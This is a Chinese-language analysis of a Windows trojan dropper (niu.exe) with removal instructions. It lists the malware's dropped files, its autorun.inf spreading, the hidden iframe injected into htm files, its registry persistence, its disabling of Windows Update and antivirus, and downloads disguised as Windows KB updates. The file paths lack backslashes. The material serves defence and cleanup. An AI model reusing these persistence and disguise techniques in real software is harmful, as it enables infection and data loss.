File: niu.exe
Size: 36141 bytes
MD5: 1E3096FAE27F2E81F0AA73FFFA5171B0
SHA1: BF1639F93B2B6E6E69A32FA6ECEC8ABDB94AC7CF
CRC32: C9ACBC14
病毒運行後:
文件變化:
釋放文件C:WINDOWSsystem32crsss.exe
在每個分區下面釋放
autorun.inf和niu.exe 右鍵菜單無變化
遍歷所有分區的htm文件
在其後面 插入代碼<IfrAmE src=/htm/htm.htm width=0 height=0></IfrAmE>
遍歷所有分區 刪除*.gho文件
刪除C:WINDOWSsystem32verclsid.exe
註冊表變化
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
下添加<crsss><C:WINDOWSsystem32crsss.exe> [] 達到開機啟動的目的
修改HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue
為0x00000001
達到 屏蔽隱藏文件顯示的目的
在HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate下面增加
DisableWindowsUpdateAccess鍵 並把其鍵值設為00000001 關閉windows自動更新功能
如果無連接網絡 還有如下變化
不斷暴力寫HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart Page為 www.hao123.com
並且修改HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage 的值為00000001
使得IE主頁修改按鈕失效
如果連接網絡則為如下變化
下載/htm/IEURL.txt到系統文件夾
該文本內為壹網址 那麽上面的被修改的主頁則變為此文本中的網址
下載/htm/exe.txt到系統文件夾 讀取裏面的內容
下載木馬
/xp/WindowsXP-KB888303-x86-CHS.exe
/xp/WindowsXP-KB838201-x86-CHS.exe
/xp/WindowsXP-KB284303-x86-CHS.exe
/xp/WindowsXP-KB398305-x86-CHS.exe
/xp/WindowsXP-KB983306-x86-CHS.exe
/xp/WindowsXP-KB828301-x86-CHS.exe
/xp/WindowsXP-KB328207-x86-CHS.exe
/xp/WindowsXP-KB138308-x86-CHS.exe
/xp/WindowsXP-KB238104-x86-CHS.exe
/xp/WindowsXP-KB284302-x86-CHS.exe
/xp/WindowsXP-KB468603-x86-CHS.exe
/xp/WindowsXP-KB878206-x86-CHS.exe
/xp/WindowsXP-KB423807-x86-CHS.exe
/xp/WindowsXP-KB138309-x86-CHS.exe
到系統文件夾 分別命名為0temp.exe~13temp.exe
木馬生成物下面將列出 其他壹些變化
0temp.exe修改系統時間為1987年10月18日
1temp.exe比較有意思 1temp.exe運行以後會自動關閉瑞星防火墻 瑞星殺毒軟件監控 卡卡上網安全助手的ie防漏墻
等 而此關閉並非結束進程 而是相當於用戶的手動按軟件上的停止保護(如圖) 但再次運行該文件後 相關保護又會被開啟
具體原理不懂 希望高手指教
木馬植入完畢後 生成文件如下
C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
sreng日誌如下
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows]
<AppInit_DLLs><dhbpri.dll> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
服務
[Remote Debug Service / RemoteDbg][Stopped/Auto Start]
<C:WINDOWSsystem32rundll32.exe RemoteDbg.dll,input><Microsoft Corporation>
解決方法:
首先把系統時間改回來
並且修改 C:WINDOWSsystem32dhbpri.dll和
C:WINDOWSsystem32ztgpri.dll文件名為其他名稱
然後重啟計算機進入
安全模式(開機後不斷 按F8鍵 然後出來壹個高級菜單 選擇第壹項 安全模式 進入系統)
打開sreng
啟動項目 註冊表 刪除如下項目
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
雙擊AppInit_DLLs 把其鍵值改為空
“啟動項目”-“服務”-“Win32服務應用程序”中點“隱藏經認證的微軟項目”,
選中以下項目,點“刪除服務”,再點“設置”,在彈出的框中點“否”:
Remote Debug Service / RemoteDbg
系統修復-Windows shell/IE 選中
設置主頁為"about:blank"和允許Internet Explorer選項窗口和選項窗口的所有內容
然後點擊下面的修復
把下面的代碼拷入記事本中然後另存為1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]
"RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
雙擊1.reg把這個註冊表項導入
雙擊我的電腦,工具,文件夾選項,查看,單擊選取"顯示隱藏文件或文件夾" 並清除"隱藏受保護的操作系統文件(推薦)"前面的鉤。在提示確定更改時,單擊“是” 然後確定
點擊 菜單欄下方的 文件夾按鈕(搜索右邊的按鈕)
從左邊的資源管理器 進入C盤
刪除如下文件C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll改完名稱的文件
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll改完名稱的文件
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
C:WINDOWSsystem32crsss.exe
C:autorun.inf
C:niu.exe
從左邊的資源管理器 進入其他分區 刪除autorun.inf和niu.exe。
使用壹些工具清理被感染的htm等文件。不過gho文件就沒辦法恢復了。